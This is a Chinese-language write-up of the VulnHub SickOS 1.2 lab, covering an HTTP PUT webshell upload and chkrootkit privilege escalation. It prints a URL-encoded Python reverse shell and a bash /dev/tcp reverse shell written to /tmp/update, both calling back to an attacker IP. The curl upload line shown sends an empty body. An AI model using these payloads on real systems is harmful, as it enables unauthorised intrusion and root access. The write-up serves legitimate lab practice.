OSCP - SickOS:1.2 writeup

主机来源:www.vulnhub.com

下载地址:https://download.vulnhub.com/sickos/sick0s1.2.zip

用到的知识点:

PUT上传

chkrootkit提权

发现IP

安装成功后,查找此虚拟机的IP,我使用的是netdiscover

OSCP - SickOS:1.2 writeup_第1张图片

IP为10.0.3.144

nmapOSCP - SickOS:1.2 writeup_第2张图片

没啥开的端口,从80开始,扫下目录,发现test目录,然后发现有PUT方法

OSCP - SickOS:1.2 writeup_第3张图片

上传

利用weevely来生成一个木马文件,weevely是kali中的PHP菜刀

OSCP - SickOS:1.2 writeup_第4张图片

 OSCP - SickOS:1.2 writeup_第5张图片

 连接

OSCP - SickOS:1.2 writeup_第6张图片

或者直接用curl命令来上传一个小马

curl -v -X PUT -d '' http://10.0.3.144/test/22.php

客户端监听,nc -nlvp 443

curl或者浏览器中访问

http://10.0.3.144/test/22.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%2210.0.3.141%22,443%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27

获得shell

提权

利用chkrootkit提权

写入文件

 printf '#!/bin/bash\nbash -i >& /dev/tcp/10.0.3.141/443 0>&1\n' >> /tmp/update

等待,获得root

OSCP - SickOS:1.2 writeup_第7张图片

为什么用443,是因为一般防火墙策略会只开很少的端口

OSCP - SickOS:1.2 writeup_第8张图片

你可能感兴趣的:(VM破解)